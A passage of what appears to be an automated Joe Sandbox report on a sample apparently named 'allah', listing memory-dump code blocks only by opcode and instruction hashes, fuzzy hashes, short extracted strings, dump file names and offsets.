                                                                        • Instruction ID: 39039fcaaffb2b55665f2633a15d2b1eba560ac5827d58362a8e448823e7ada8
                                                                        • Opcode Fuzzy Hash: 5a241b6def18b7efbb5684da0fe1b68ccf1f55ac169fe2549104dc1ad98ee911
                                                                        • Instruction Fuzzy Hash: 0591D2A0A096894FE756EB39C45D7B97BD1EF59304F5441BDE88ECB2D3CE28E8468700
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (;y
                                                                        • API String ID: 0-1926527261
                                                                        • Opcode ID: 421555a0318cff76bf972053a631fd42ef7fa3e8689651616abaf61894b17293
                                                                        • Instruction ID: 3175ed64876fa62bc49642116ddda92d12210537756c7a828e1122e758a57f04
                                                                        • Opcode Fuzzy Hash: 421555a0318cff76bf972053a631fd42ef7fa3e8689651616abaf61894b17293
                                                                        • Instruction Fuzzy Hash: C18180A0A09A494FE75AEB3DC4597A97BD1EF58300F5441BDE88ECB2D3CD2CE8468750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8Lx
                                                                        • API String ID: 0-1785225494
                                                                        • Opcode ID: 3246c0dc6b93de40e93ad1e8ac2cbca08cb56770e5de4018303af924c44e25ff
                                                                        • Instruction ID: 39c6c467877c8cdeaed3df79452bcec6fe52525c195c3795df1f08b43f71410a
                                                                        • Opcode Fuzzy Hash: 3246c0dc6b93de40e93ad1e8ac2cbca08cb56770e5de4018303af924c44e25ff
                                                                        • Instruction Fuzzy Hash: 44519EB1B189498FDB89EF2CC495AA977D2FF9C310B1401B9E44ED7296DE24EC06C784
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HJx
                                                                        • API String ID: 0-98221368
                                                                        • Opcode ID: 4a810b193c7bf6e05dfeb261b77934aba2a2ebceea184b7b2546a9e37ba15e19
                                                                        • Instruction ID: deff9c4054b27fda1d4c52a0db7e8a445847674896c5909c17f0997be71b93ad
                                                                        • Opcode Fuzzy Hash: 4a810b193c7bf6e05dfeb261b77934aba2a2ebceea184b7b2546a9e37ba15e19
                                                                        • Instruction Fuzzy Hash: 8D417CB1A0EA8A0FE796E23D849A1B57BD1EF45210B4801FBE44DC72A3DD08EC078385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: XOx
                                                                        • API String ID: 0-1393043532
                                                                        • Opcode ID: a707dd93cb1be8cadf9c5222ae1676f79277459d2f1ada9c4f76730927582bd9
                                                                        • Instruction ID: 1539fe45f6d41a8f7e7acbdbff99cd9af986bdd82f2f3cbaa583296e4e0d6f92
                                                                        • Opcode Fuzzy Hash: a707dd93cb1be8cadf9c5222ae1676f79277459d2f1ada9c4f76730927582bd9
                                                                        • Instruction Fuzzy Hash: DD418AA2A1DA8A0FE767873DD45E1B43BD1EF85310B0805FBE48EC7197DD08E8468781
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gy
                                                                        • API String ID: 0-2028992370
                                                                        • Opcode ID: 2f16314e4e8d5f01d92d388b90cc7d8773791154fa740fce6df89b64d3d519df
                                                                        • Instruction ID: a5230256785f3e473346f363c04ae7172e8d5fe0a5bb03adf671004ab2219ae2
                                                                        • Opcode Fuzzy Hash: 2f16314e4e8d5f01d92d388b90cc7d8773791154fa740fce6df89b64d3d519df
                                                                        • Instruction Fuzzy Hash: A60128A2F1AD1B4BEAA7D22C98551B9B2E2DF4961077401BAC80EC3193CE0CEC064385
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: x,x
                                                                        • API String ID: 0-3115053579
                                                                        • Opcode ID: 2ab2ee0c9e1bedc0f426ff8f33b9e356ec65b27f5435b8faf70efe6ebf8b77df
                                                                        • Instruction ID: c0fe3a37cb8493cca15f8474b13e2e569e1549b53d2f227df3b45109ac4323c7
                                                                        • Opcode Fuzzy Hash: 2ab2ee0c9e1bedc0f426ff8f33b9e356ec65b27f5435b8faf70efe6ebf8b77df
                                                                        • Instruction Fuzzy Hash: 44F090B2B1CA084FEB5DEB1C98161B9B3D2EBC9126744427FD14EC3562DA2198064744
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48c89f55550770810db7e353b074b65633a004f61ef4af8fdef75ce02c04531e
                                                                        • Instruction ID: 92f8490199b878fafbf8516dc5c664ef4e16971de950af5bbb8fa63a080551f9
                                                                        • Opcode Fuzzy Hash: 48c89f55550770810db7e353b074b65633a004f61ef4af8fdef75ce02c04531e
                                                                        • Instruction Fuzzy Hash: 1CF1FAB0A09A494FE759EB2DC45A7B977E1FF59310F5401BEE84EC7292CE38E8468740
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        • Instruction ID: 01759d1a762277438ae18fe52384edd9091a07d0a3015d8dc90bcd87c427cef2
                                                                        • Opcode Fuzzy Hash: 28bd885730bc62e9e9b6697267a8205a07e85fa64f4512bbb9de6cacffd0e7a6
                                                                        • Instruction Fuzzy Hash: E431FCB290CB1D4FEB58EA29D84F5F977E4EBA5311F00413FE44DD3151EE20A9568B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f71407a356243754b61a8e716c2cacece945623635592c46c5cc6b9db0202495
                                                                        • Instruction ID: 67b03778f36beeb9333fed75d9231b34959dc1c758283d57c08625e26acb0071
                                                                        • Opcode Fuzzy Hash: f71407a356243754b61a8e716c2cacece945623635592c46c5cc6b9db0202495
                                                                        • Instruction Fuzzy Hash: 9E31D97290CB1C4FDB68EA2CD84E5F977E4EBD5321F00427FD44DD3151DA20A9468B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9ab0f5d36b9a238063af927b4814f5736652afb2a4670216268404f3728763a6
                                                                        • Instruction ID: 3ccab2dbcf92113142e3f0c30b8d793082fc89e53b7cc9bac822ff9219eda8a3
                                                                        • Opcode Fuzzy Hash: 9ab0f5d36b9a238063af927b4814f5736652afb2a4670216268404f3728763a6
                                                                        • Instruction Fuzzy Hash: E8217D92E0D6590BF219663CA8471B57BC1DF96360B18017EE44EC7393EC299C53C355
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2ad0d15b183c8ecce39ecb364eae9d2e32f9fad9fe8c0d198866abafc01f942
                                                                        • Instruction ID: 3af18dc8ba71993923688f8b236ad75340e7fe2af7b7d9236e04fd2253df222d
                                                                        • Opcode Fuzzy Hash: c2ad0d15b183c8ecce39ecb364eae9d2e32f9fad9fe8c0d198866abafc01f942
                                                                        • Instruction Fuzzy Hash: AC3135B1918A888FD749EF3CC40A2A97BE1FF89315F10007EE44ED3292CA35E802CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b99ac13bc447af9e1a71d9c43cf4f161513342bff753ae943675499a5a1c616
                                                                        • Instruction ID: 637e80c0a430f579dffdded3ad179d6fedabe135da2c85b2382f41ff3c03e3e3
                                                                        • Opcode Fuzzy Hash: 3b99ac13bc447af9e1a71d9c43cf4f161513342bff753ae943675499a5a1c616
                                                                        • Instruction Fuzzy Hash: 1221F9E1D1D94B4FE3EA9238C46A6763AD1EF45311F580179E84EC65E2FE18F881C390
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5109c18ac4675d66815a5230028f1a2c3873030d3cb8cd387a7fe50380cb8072
                                                                        • Instruction ID: 1dc00c823e5863530c3c597510342ee794a9645625c8be88506f279c4111dfc5
                                                                        • Opcode Fuzzy Hash: 5109c18ac4675d66815a5230028f1a2c3873030d3cb8cd387a7fe50380cb8072
                                                                        • Instruction Fuzzy Hash: D331B8DA80F7870FE353D679996E1A57FE0AF0132170800F7E98D871A7EE48A91D4791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 75880ac3a2148340915b00e2fc8bef42562155ddcd310633df479faf090a80b1
                                                                        • Instruction ID: 08a0a333e8507240634526f763add98dafec2c9f6284b647513b120a3ace54c1
                                                                        • Opcode Fuzzy Hash: 75880ac3a2148340915b00e2fc8bef42562155ddcd310633df479faf090a80b1
                                                                        • Instruction Fuzzy Hash: 882106B091C6460FE755DA2CD45DAB57FE1EFA5210F4805BBE88CC71A2D818D9C58381
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 18bb2df7275bbe8eaf9ff8319f5054036276a903da715d26968beae7de03696d
                                                                        • Instruction ID: 934885c89dfc94cabcee99ab189aa1587cb6086ecad7d5503ec6bb7bff53edac
                                                                        • Opcode Fuzzy Hash: 18bb2df7275bbe8eaf9ff8319f5054036276a903da715d26968beae7de03696d
                                                                        • Instruction Fuzzy Hash: BA21B2C2A1DA890FE796D67C845AAB56BC1FF98300B04417EE44EC35D3EE1CE80A8291
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 256610f709af5aa33fd5caec4a1b7b8b23f38afbbb21eb8c1f9321ce96727b09
                                                                        • Instruction ID: 49963b27cee80693990dacafa836a52a81f9022d0b2b002b9602194dc33b53a6
                                                                        • Opcode Fuzzy Hash: 256610f709af5aa33fd5caec4a1b7b8b23f38afbbb21eb8c1f9321ce96727b09
                                                                        • Instruction Fuzzy Hash: 77113FB2A16D1D4FE259E56D884E57572C1EB84310B55027EE40EC33A3DC14FC0382C9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a1265832b0509c91a2f7f6adb72de249e5aefbc83126b743a7e62367b74fb21
                                                                        • Instruction ID: 37800ae9a866ff5f76fe0c7d814ae14ed9fba6a72f129b7a7ab4099a306cfdcb
                                                                        • Opcode Fuzzy Hash: 1a1265832b0509c91a2f7f6adb72de249e5aefbc83126b743a7e62367b74fb21
                                                                        • Instruction Fuzzy Hash: D811A04198FAD60FE34757B48C295E23FE5DF8B51070D42EBE486CA4A3D84C898BC361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f19b627f3610d54feb39129cae970df66bff8bb6a54633b12584beb7c2a08a88
                                                                        • Instruction ID: c5e7189ea132500719b657055632c64b28b78d69fe90184c4e4c04b90032b7c3
                                                                        • Opcode Fuzzy Hash: f19b627f3610d54feb39129cae970df66bff8bb6a54633b12584beb7c2a08a88
                                                                        • Instruction Fuzzy Hash: F61159A180E7C91FD7539778982D0E53FE0EF87120B0901FBE489CB063DC58580AC762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4eb846db5f63bed049fb1976cfeb15f5c1401e2110318a3ec188f158488da27
                                                                        • Instruction ID: 20e46e459e930dc0302fc417e908fb262ecd1e8261349babc7cd3d411cd1958e
                                                                        • Opcode Fuzzy Hash: f4eb846db5f63bed049fb1976cfeb15f5c1401e2110318a3ec188f158488da27
                                                                        • Instruction Fuzzy Hash: E2117C2158E6D55FC34397749C24AD27FE5DE8B21030A01EBE08ACB5A3C91D9947C761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29fcee351e695fa21bf80655b0bce6aef9ec1a39fa3b981c9c2c85f413d73e87
                                                                        • Instruction ID: 31f15b61c7e36bb99842c4361cc25ea9de5923a4f28380b1d5575c47fcd63799
                                                                        • Opcode Fuzzy Hash: 29fcee351e695fa21bf80655b0bce6aef9ec1a39fa3b981c9c2c85f413d73e87
                                                                        • Instruction Fuzzy Hash: 62012BC391E94A0EE6A7867CA4575756FC1FFD0250B484279E88ED71D2EE09F4028284
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd01ca9978a20d0786033a70aeaabebec1a34ba3aef0c72f5d5fcedd2cfc2421
                                                                        • Instruction ID: c9a814a0b584f9401fd248abeae1cfc9bfcb0940c8542169e7945913579983d4
                                                                        • Opcode Fuzzy Hash: bd01ca9978a20d0786033a70aeaabebec1a34ba3aef0c72f5d5fcedd2cfc2421
                                                                        • Instruction Fuzzy Hash: 5C1163B1A19B494FE399DF3880866A5B7D2FF98304F5054BDA48EC3292EE25A402C701
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6fc17ebad79a558e1f26856ca506ef2fdf13aeaa024690185c22caea0aeb55b0
                                                                        • Instruction ID: a2376d5ccac85baf048b4f30fcc7fb98581e24e95e0094b1896cc9a63d1f7db0
                                                                        • Opcode Fuzzy Hash: 6fc17ebad79a558e1f26856ca506ef2fdf13aeaa024690185c22caea0aeb55b0
                                                                        • Instruction Fuzzy Hash: D911049195E7C60FE393977888192617FE1DF47120B0944FFD8CACA5A3D90DD846C342
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b6cf25d4219139834554f0e2b9c4a66ccab9f5faa4410f517ff868ddb5166867
                                                                        • Instruction ID: fd51a6ae25f1b464b6de9d3d18bb1fe95ccac783c87a4c972d8e46cc030290da
                                                                        • Opcode Fuzzy Hash: b6cf25d4219139834554f0e2b9c4a66ccab9f5faa4410f517ff868ddb5166867
                                                                        • Instruction Fuzzy Hash: 7A0128A050E6450FD743EB34C4493B9BFD1DF84224F08467BD44CC60A2CE18CAC5C396
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3973981095c2ef7f94dd225acb059a45112358fb17d39f4e57d09a95d23507e
                                                                        • Instruction ID: 2d03e6bf78622a52762c7839992f324c2f5cffa29825fbc51ed96961006d3325
                                                                        • Opcode Fuzzy Hash: d3973981095c2ef7f94dd225acb059a45112358fb17d39f4e57d09a95d23507e
                                                                        • Instruction Fuzzy Hash: AFF0F4F184D68C1FC756CF28881A5AB7FE4EF95241B04016FF449C72A2E62498088791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8caf8282b926bac4bc6e0f4c860f0efebb5413462da7a2737eccf1e2598beacb
                                                                        • Instruction ID: 5fb965459319dd251400ec3a56813a7ef9af33492bf593ba912d0b9dd58cdb7c
                                                                        • Opcode Fuzzy Hash: 8caf8282b926bac4bc6e0f4c860f0efebb5413462da7a2737eccf1e2598beacb
                                                                        • Instruction Fuzzy Hash: B9F08295B265190AEB07B77DC41A7FA7286EF88741FA04877E85EC35C7CC68E8060691
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 348ed057c06c64dbb4981a1af9ed0699925588fe8c26d1c209402a660063bb5e
                                                                        • Instruction ID: 842eb02c444513eadc88ea95aa5a2bd0401c5b66a8542dd830e57241ed3d2325
                                                                        • Opcode Fuzzy Hash: 348ed057c06c64dbb4981a1af9ed0699925588fe8c26d1c209402a660063bb5e
                                                                        • Instruction Fuzzy Hash: 8AF02EA5B296894BE756EF3CD40927177C5FF45215F5404FDE85FC32A2DE28DC418281
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.686347845.00007FFBAC1E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac1e0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb457f338d1d51cb5e94632bff9345fc3b57f63655b2409e02279c612bc96878
                                                                        • Instruction ID: ccde62c4d5188c54d7b3541557f1577ee701bd8530bfe42021d3ebc6ba15cef5
                                                                        • Opcode Fuzzy Hash: fb457f338d1d51cb5e94632bff9345fc3b57f63655b2409e02279c612bc96878
                                                                        • Instruction Fuzzy Hash: 18E08063F0ED2E0EF6A6E11C74195F493C1DB8863574511F3D90DD3152DD09AC3581D5
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8bf15c7851d5dcb693e583b0e43b85e6eea7fa07a0e53cc23a9cae6b2bbbb509
                                                                        • Instruction ID: 0a76bde11835faba5fd3ede304beb0609b4ba04c0cb232c03e3b0d392a646b91
                                                                        • Opcode Fuzzy Hash: 8bf15c7851d5dcb693e583b0e43b85e6eea7fa07a0e53cc23a9cae6b2bbbb509
                                                                        • Instruction Fuzzy Hash: 81D05BD3A4D50A49E5965568B45A0F55BC1FB90264B504576E88D824C6FD1FF5428140
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 57b546e50019738db6c9d070fcc70b2b8b923f1faa16fad1f637d71b14bd9159
                                                                        • Instruction ID: a81a73746291e7f7346c77dc6b44bfd459d0b906303da586ac7fc54433714144
                                                                        • Opcode Fuzzy Hash: 57b546e50019738db6c9d070fcc70b2b8b923f1faa16fad1f637d71b14bd9159
                                                                        • Instruction Fuzzy Hash: B7E086F3A4D24247D749DE69E05A0EB7BD0EF98204F04067FF8CE97151DA19D501C786
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.690590281.00007FFBAC5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac5a0000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1a88d34712631f701673ec5f891a3ea8d37a442d5952f661c7277667a1194330
                                                                        • Instruction ID: 79caf3f44d13934bda0057de30b0c0701bdc32cd0e27ed52050ba73bbbe337c7
                                                                        • Opcode Fuzzy Hash: 1a88d34712631f701673ec5f891a3ea8d37a442d5952f661c7277667a1194330
                                                                        • Instruction Fuzzy Hash: 37E0E67160C6194BC705EF18D0554AE77E0FF98314F0046BFE48DD7251DA39D941C781
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5__^
                                                                        • API String ID: 0-815891306
                                                                        • Opcode ID: d78912437b5a47541f53878d7493c49e2464a2ee5fa18948c0f1d4be3e9f37d7
                                                                        • Instruction ID: 83a45f57a1a7984aa515da9b49b5cf5e5f2a188dd76365586144dbca23d3e5a4
                                                                        • Opcode Fuzzy Hash: d78912437b5a47541f53878d7493c49e2464a2ee5fa18948c0f1d4be3e9f37d7
                                                                        • Instruction Fuzzy Hash: 7541F9E7E5D2698FD702EB7CA8E51D23BA0EF0232870501B7C5C5CE163FA046C5AC6A5
                                                                        Uniqueness
                                                                        • Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.685907097.00007FFBAC110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC110000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ffbac110000_allah.jbxd
                                                                        Similarity
